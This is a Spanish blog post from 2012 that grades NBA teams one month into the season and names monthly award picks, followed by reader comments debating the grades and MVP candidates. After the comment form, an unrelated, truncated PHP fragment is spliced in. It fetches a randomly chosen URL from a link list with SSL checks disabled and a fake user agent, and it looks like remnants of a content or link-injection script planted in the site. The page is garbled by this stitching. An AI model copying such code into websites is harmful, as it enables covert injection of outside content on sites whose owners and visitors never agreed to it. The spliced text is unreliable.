Informe #1

29 de November de 2012 por TheDeerHunter

Transcurrido casi un mes desde el inicio de la regular es buen momento para hacernos una composición general de lo visto hasta la fecha.

SOBRESALIENTE

Grizzlies (11-2): Están en un estado de forma increíble tanto en ataque como en defensa. Se junta la exquisita madurez de Marc, la salud de Zach, un rendimiento especialmente dulce de Gay y Conley, el sacrificio habitual de Allen y la irrupción de Bayless como 6º hombre. Todo macerado con la dirección impecable de Hollins. Ojo porque el calendario hasta ahora ha sido durísimo.

Spurs (13-3): Si lo difícil no es llegar sino mantenerse a este equipo hay que hacerle un monumento. La inmortalidad es posible (Duncan 27.3 PER con 36 añitos y 15 de experiencia en la liga). Y cuidado que Manudo no le de por arrancar. Nótese que arrastran la lesiones de Leonard y S-Jax.

Heat (10-3): Parece que ganan por castigo. La sobriedad que da el anillo. LeBron en modo tranquilo sigue siendo una bestia. Grandes noticias el rendimiento de Bosh y el impacto de Allen. El mejor ataque de la liga y favoritos claros.

Thunder (12-4): Si Durant aprende a involucrar a sus compañeros puede volverse devastador. Los subcampeones han disfrutado de un inicio cómodo, mostrando su contundencia habitual a pesar de la salida de Harden. Veremos si Martin es un espejismo o una excelente alternativa al barbas.

Knicks (10-4): Un arranque como no recordaban ni los más viejos del lugar, arrastrando bajas significativas y la sombra de Jeremy Lin. Increíble la adaptación de las nuevas incorporaciones y Melo ejerciendo de líder mejor que nunca. La vuelta de Stat y Shumpert debería suponer una mejora… en teoría.

Nets (10-4): Encajando piezas, reciente recuperación de Wallace y una versión capada de Joe Johnson. Calendario amable, pero cada día mejor y extraordinaria versión de Brook Lopez (¡y la asombrosa e indescriptible cifra de 6 rebotes por partido!)

NOTABLE

Hawks (9-4): Josh Smith no está jugando bien a pesar del partidazo de hoy y empezaron algo flojos. Sin embargo, para estar encajando varias piezas y encontrándose a si mismos los resultados son buenos y cada día se les ve más sólidos. Lideran la eficiencia defensiva de la liga. Calendario suave, eso sí.

Bucks (7-6): Empezaron fortísimos con un Jennings en modo MVP pero la situación se ha estropeado un poco. No entendemos muchas de las decisiones de Skiles y algunos hombres importantes parecen desubicados.¿Son equipo de playoffs o se trataba de un espejismo?

Warriors (8-6): Decía Sancho que no defienden un pimiento y probablemente así será pero ahí están, en la pomada del Oeste y con bastante potencial de mejora (propia) a poco que entrara Bogut (utópico), mejore Klay (posible) o explote el bichito Barnes (probable). Una lástima perder a Rush tan pronto. Ojo porque han disputado 8 de sus 14 partidos fuera de casa.

Celtics (8-7): Luces y sombras, pero más de lo primero que de lo segundo. Rondo está dirigiendo al nivel de John Stockton de los buenos tiempos (a pesar de que hoy ha acabado la racha) y Garnett y Pierce siguen dando para ganar muchos partidos. Las mala noticias son que un Terry más un Lee no dan un Allen y Jeff Green ha vuelto muy mermado. Muchos problemas en el rebote y defensivos. No obstante, los verdaderos Celtics se ven en mayo. Si no fuera porque es completamente irrelevante me gustaría saber cómo es posible que en 5 minutos disputados Milicic sume un -30 de valoración PER.

Sixers (9-6): Da bastante rabia el caso Bynum. Sus compañeros, en buena lógica, no le están esperando. Holiday y Thaddeus lideran un grupo comprometido a pesar de la distracción externa. Por desgracia, necesitarían de su fichaje estrella para plantar verdadera cara a los cocos del Este.

Bobcats (7-7): Llevan en un mes las mismas victorias que el año pasado en todo el curso. El equipo sigue sin ser para tirar cohetes y se supone que todo irá a peor. Han tenido un calendario amable y bastante suerte, pero también un excelente rendimiento de parte de Walker y Mullens, más una gran aportación de los nuevos. Tiene mucho mérito hacer ver a Haywood como efectivo útil.

BIEN

Clippers (9-6): Se les ha estropeado un tanto el panorama la última semana, con momentos altamente decepcionantes. Antes habíamos visto una versión cuasi-all star de Jamal Crawford y una mejora significativa de DeAndre y Bledsoe. Han recuperado a Billups. Son de los pocos (dos) que puede decir que han ganado a los Grizzlies.

Nuggets (8-7): Al contrario, una buena racha les hace maquillar un inicio dubitativo. Les está costando arrancar. Lawson ha estado como la chata y Gallinari e Iguodala no terminan de asumir el mando. Sin embargo la pareja McGee-Faried está causando estragos. Son “los otros” que han logrado sorprender a Grizzlies. Pueden ir a más.

Jazz (9-7): Equipo con desequilibrios conocidos que no se han terminado de resolver. Tienen dinamita suficiente para ganar partidos pero se quedan un escalón por debajo de la zona noble. A la parejita Jefferson-Millsap, se ha unido la consolidación de Favors y Hayward y la gran adaptación de Mo, Foye y Marvin. Necesitan algo más.

Mavericks (7-9): Sin Dirk la vida es más complicada. Sin embargo Carlisle ha logrado involucrar al máximo todo efectivo disponible. Disfrutan de la mejor versión de Mayo desde que aterrizó en la liga, así como la mejor versión de Vince desde hace largo tiempo. Kaman, Collison… incluso Wright, Crowder o Murphy están rindiendo muy bien. Parecen buenos mimbres a falta del alemán. Si acaso se aprecia un declive algo más acusado de la cuenta en Marion o Brand.

APROBADO

Rockets (7-8): El fichaje de Harden es uno de los movimientos del año. Sin embargo Lin no ha arrancado bien y Asik va a días. Se apostó fuerte por una hornada de rookies aparentemente excelente y por unas causas u otras se les ha cerrado la puerta.  Les falta algo para que les tomemos en serio.

Bulls (7-7): Muchos creíamos que la posible vuelta de Rose este año no se la creían ni ellos y que se dejarían llevar esta temporada. Desconozco las posibilidades de lo primero, pero en cuanto a lo segundo no se les puede reprochar nada. Tan duros defensivamente como siempre, con una inmensa versión de Noah, muy digna de Deng y Boozer más un sorprendente rendimiento de Nate Robinson, con toda la segunda unidad.

Wolves (6-7): No hacemos sangre porque los Wolves bastante tienen con lo suyo. Personalmente pediría dimisiones por el caso Roy pero lo demás han sido desgracias. Esperemos que no se conviertan en los nuevos “Mac-Blazers”. De momento no están mal colocados tras la vuelta de Love y ante la cada día más cercana de Ricky.

Suns (7-9): Grupo interesante pero de un nivel defensivo bochornoso. Gran rendimiento de Dragic, Gortat y Scola. Terror de las “marías” de la liga otra cosa es contra los gallos. ¿Cómo es posible un talento tan desaprovechado como el de Beasley?

Pacers (7-8): Sin Granger no es lo mismo y Paul George aún no ha logrado recoger el testigo. Se une el relativo estancamiento de Hibbert, así como la calamidad que se confirma que es Augustin. Hill y West llevan la batuta manteniendo, a duras penas, sus opciones intactas.

SUSPENSO

Lakers (7-8): No sabemos si van o si vienen. Si alegrarnos por la salida de Brown Jackson o aterrarnos por constatar que él no era causa de los males. Tan sólo hemos podido vislumbrar ramalazos de demoledora  potencia, destacados en un mar de anarquía ofensiva y defensiva. Vestuario complicado que puede ponerse al rojo vivo. El caos donde verdaderamente sólo se puede sentir cómodo Artest. Cuidado porque vienen curvas.

Blazers (6-9): Les ha tocado la lotería con Lillard y sin embargo no terminan de arrancar. Resulta un poco preocupante que la explosión de Batum, Hickson y el propio Lillard coincida con un bajón significativo de Aldridge aunque esto último parece debido a problemas físicos. El banco es un solar. Los primeros que han perdido frente los Wizards.

Magic (5-9): Es posible que nos pasáramos con las más pesimistas previsiones. Con muchas lesiones significativas, han ganado partidos y han llegado a jugar puntualmente bien. Al menos se puede decir que suelen ganar a los equipos “flojos”. Contra los fuertes es otro cantar.

Hornets (4-10): Pintaza increíble la de este Anthony Davis, lástima de lesión. Gordon, oh noticia, ni un minuto. Con todo están sacando petróleo de los Robin Lopez, Vasquez, Aminu o Jason Smith, junto a la constante aportación de Anderson. Interesante rendimiento de los otros rookies, Austin Rivers y Brian Roberts.

Kings (4-10): Calendario criminal del que no han salido de todo mal parados. Jason Thompson ha dado un paso adelante y forma una pareja interesante con DeMarcus. También vemos a Brooks coger paulatinamente el tono. En el lado negativo el rendimiento de Isiah, junto con el escaso impacto hasta el momento de Thomas Robinson.

MUY DEFICIENTE

Pistons (5-11): Con el terrorífico arranque de Stuckey y Brandon Knight (ya ni hablar de Maggette) padecen una absoluta falta de fluidez ofensiva. A pesar de un Monroe inmenso son el peor ataque de la liga. La buena noticia es lo que están empezando a ofrecer Drummond y Kyle Singler.

Cavs (3-12): Irving y Varejao empezaron jugando maravillosamente bien hasta que se lesionó el primero. A parte de los rookies, que no han salido tan rana como muchos aventuraban, el resto del equipo está muy cogido por los pelos. Se deberían alinear varios astros para que no pierdan un carro de partidos.

Raptors (3-13): En los últimos tiempos se han ganado una cierta fama de “madres”. Querer y no poder. Mezcla de mala suerte e incapacidad de resolver momentos calientes. El calendario tampoco ha ayudado. Castigo excesivo para el nivel de juego mostrado.

Wizards (1-12): Camino de esperpento a pesar de la victoria de hoy, pero sin Wall ni apenas Nené tienen muy poquita cosa. Decepcionante, una vez más, Okafor. Beal bastante verde de momento. Sus mejores hombres serían los últimos en la rotación de cualquier plantilla normal.

PREMIOS MENSUALES

MVP: Lo fácil será que nombren a LeBron y Durant como mejores jugadores de cada conferencia. Nosotros añadimos los nombres de Duncan y Marc por un lado, y los de Melo y Brook Lopez por el otro.

Rookie: Con Anthony Davis afectado por las lesiones, el mejor en el Oeste ha sido Lillard. En el Este los mejores partidos los ha firmado Dios Waiters, aunque está algo lejos de mantener regularidad.

Sorpresa: En el Este nos quedamos con las 7 victorias de Bobcats, teniendo bastante presente lo del año pasado. Lo podemos personalizar en Kemba Walker, que ha mejorado en casi todo (especialmente en los 2.2 robos que promedia). En el Oeste me quedo con el rendimiento de Jamal Crawford, a un nivel que no se acercaba desde que fue mejor 6º hombre de la liga.

Decepción: Un equipo tan brutal como Lakers está jugando asombrosamente mal. Se personaliza en sus hombres grandes, Pau y Howard están fuera de forma y desubicados. En el Este quizás me quedaría con Joe Johnson. Da miedo pensar cómo estarían los Nets con él a su nivel.

Esfuerzo en vano: En el Este para mí no hay duda con el brasileño Varejao, aunque Monroe también lo puede merecer. En el Oeste nos quedaremos con Cousins.

Comenta

18 comentarios a esta entrada

  1. Shaggy dice:
    #1

    En los LAL el entrenador que sale es Brown ¿no?, ya nos gustaria a todos los aficionados que Jackson estuviese sentado en el banquillo

      Citar

  2. Laker1624 dice:
    #2

    Como ya he dicho en la cronica de esta jornada yo me quedo indudablemente con Melo como MVP del mes. No creo que nadie esperara el buen balance que llevan los Knicks a dia de hoy, y mas cuando mucha gente los veia perores que la pasada campaña. Estan entre los mejores de la liga y creo que ese salto cualitativo se debe al gran rendimiento del sr Melo, sin negar el merito del resto del equipo que tambien esta rindiendo a un buen nivel. Anthony se ha puesto el equipo a las espaldas y lo ha plantado entre los colosos de la liga teniendo un equipo algo inferior.

      Citar

  3. Sancho88 dice:
    #3

    Grandioso análisis Deer

      Citar

  4. HisRoyalAirness dice:
    #4

    Grande Deer! Suscribo punto por punto (menos por lo de los Wolves, a los cuales les subiría la nota porque debían de estar con 0 victorias)

      Citar

  5. HisRoyalAirness dice:
    #5

    Las estadísticas de Timmy-D son acojonantes:

    36 años–> 18´4 puntos, 9´8 rebotes, 2´6 asistencias, 2´5 tapones, 52% en TC y 76% en TL

    GOD SAVE THE KING

      Citar

  6. txusma dice:
    #6

    Shaggy:
    En los LAL el entrenador que sale es Brown ¿no?, ya nos gustaria a todos los aficionados que Jackson estuviese sentado en el banquillo

    Corregido. Nos traiciona el subconsciente.

      Citar

  7. Denise dice:
    #7

    Muy buen analisis Deer aunque no estoy de acuerdo en las valoraciones de algunos.

    Sin duda, el muy deficiente debe ser para Lakers, rondando el 50% de victorias con semejante equipo y ganando 1 solo partido fuera.

    Después veo que les exiges mucho a equipos como Kings, Blazers o Magic cuyo rendimiento está por encima del esperado, al menos por mi.

    Los Bobcats deberían llevarse un sobresaliente.

    En cambio, les exiges bastante poco a buenos equipos como Nuggets y Celtics a los que le das un bien.

    De todas formas, buen articulo.

      Citar

  8. Esteban dice:
    #8

    tampoco para q Lopez sea MVP

      Citar

  9. GreenPride dice:
    #9

    Fenomenal analisis Deer aunque estoy de acuerdo en que Lakers deberia ser muy drfucurnte y Celtics o Nuggets suficientes por el potencial de sus plantillas. Subiria a los cats a sobresaliente ya habra tiempo de bajarlos y un bien a los rockets En MVP para mi Melo en el Este y Zach&Marc en el Oeste Rookie para Lillard sin duda En cuanto a mis sensaciones los Heat muy favoritos en el Este Atencion a los Nets y aspirantes Grizzlies con salud en el Oeste Aun quedan equipos por arrancar del todo como Celtics Lakers o Pacers que deberia mejorar mucho y espero la caidas de equipos como Hawks o Sixers si no debuta el cabra loca Bynum

      Citar

  10. TheDeerHunter dice:
    #10

    Supongo que es una cuestión de matiz y del concepto subjetivo que tenemos cada de la nota, a la que tampoco hay que darle mayor importancia en este caso.

    Para mí es un hecho demostrable que ni todo ha sido una mierda en L.A. como para el deficiente (para muestra la maravilla que es ver a kobe “doing work” cada día) ni todo han sido rosas en Charlotte (el palizón o la mala racha de resultados que ya están atravesando) Con todo lo segundo sí me lo planteé realmente. Lo primero niego la mayor.
    Del resto, he de decir lo mismo, matices. Confieso que se nos atragantó el artículo y que había que revisar el enfoque de cada uno cada día (en jornadas con 14 choques del ala) Tanto que yo mismo llegué a poner en duda su publicación. Más de uno ha quedado finalmente trabucado. La nota debería ser lo de menos.

    El día que lo miré Brook Lopez rozaba un 24 de PER. Está siendo el mejor de su equipo y es mucho. De todas formas a mí me gustaría que eligieran a Melo y a Duncan como MVPs de cada conferencia.

    Muchas gracias por los comentarios, chavales.

      Citar

  11. Sancho88 dice:
    #11

    Zach Randolph chicos. Para mí, es el MVP hasta el momento. Ha sido el elemento diferenciador con respecto a la temporada pasada para los Grizzlies. Sin él, seguramente estarían peleando por las últimas plazas del Oeste, y con él son líderes. Junto a Marc, están formando la mejor pareja de pívots hasta el momento. Dos tipos con una IQ bastante elevada, sin alardes físicos pero que le demuestran a Hollins dónde estaba el camino contra los Clippers el año pasado, y dónde lo volverá a estar esta temporada en cualquier eliminatoria que tengan que afrontar. Además, está en 17-13, unos números que asustan, reboteando más que en toda su carrera y atrapando 5 rebotes ofensivos por noche. Eso te da muchas más opciones para seguir anotando en segundas jugadas.

      Citar

  12. melo15 dice:
    #12

    Puede que me equivoque pero yo no veo a Marc tan grandioso como dicen algunos, le vi contra Lakers y en mi opinion buscaba demasiado la asistencia aveces da la sensación de que quiere forzar demasiado el super pase y no tiene porque. Aparte de que esta reboteando poco, 6,50 peor que Brook Lopez.
    Yo creo que esto de las asistencias es bueno y ahi estan los resultados pero creo que se tendria que centrar mas en rebotear y estas cosas.
    MVP Zach y Melo pero de calle.

      Citar

  13. TheDeerHunter dice:
    #13

    ¿Lo viste contra Lakers y no te cagaste vivo?
    ¡Pero si nos hizo trizas!!! ¡Toreó a nuestro juego interior como si fueran viles ternerillos!!
    Precisamente… ese fue un ejemplo muy visible de quién es el líder de ese equipo. El 100% del juego pasa por sus manos. Hacia siglos que no veía un C generar tanto juego a su alrededor. El base se limita a subir la bola y a dársela a Marc… todas las veces.
    Zach, Gay y Conley son simples ejecutores (sin menospreciar, ojo) Al hilo, Zach es obviamente una inmensa mejora al año pasado, pero lo de Marc es sencillamente escandaloso, numeros a parte que también son impresionantes. Muchos están empezando a mentar comparaciones con Sabonis. Palabras mayores.

      Citar

  14. TheDeerHunter dice:
    #14

    Ah… y luego en defensa no me jodas

      Citar

  15. Blade Petrovic dice:
    #15

    Yo tambien vi el partido y marc manejaba el partido de una manera…. buena defensa,buena anotacion y sobretodo con los pases que da es un gusto verle jugar ahora mismo es uno de los 4 mejores pivots no?

      Citar

  16. Laker1624 dice:
    #16

    Actualmente Marc esta entre los mejores pivots de la liga sin duda. Su progresion ha sido decisiva para que los Grizzlies esten tan arriba, pero para mi el rendimiento de Randolph es el factor clave de este equipo y por el que pasan sus opciones de hacer algo importante. Randolph en su mejor version me parace uno de los mejores jugadores de la liga y en mi opinion es el crack del equipo.

      Citar

  17. nba dice:
    #17

    El tema de Memphis es que juegan de cine y con los roles muy claros pero no se si a una serie de partidos seran capaces de ganar, porque el tema esta en que sus interiores Zach-Marc suelen acumular muchos minutos en temporada regular y el banquillo en esas posiciones sufre un bajon de calidad

      Citar

  18. Pop dice:
    #18

    Marc contra los Lakers hizo lo que le salió de los mismos. Lo que quería. Destrozó a LA él solito. Como dice Deer, todas las jugadas eran subir el balón y pasársela a Marc. Supongo que no la subiría él botando para cansarse menos. Y cuando no lo hacía directamente, bloqueos, bloqueos por todas partes.

    @Melo, Randolph será el ejecutor y el que se lleva las estadísticas al saco, pero Marc es el que dirige a su equipo. Al carajo los rebotes/partido. Él hace ganar partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>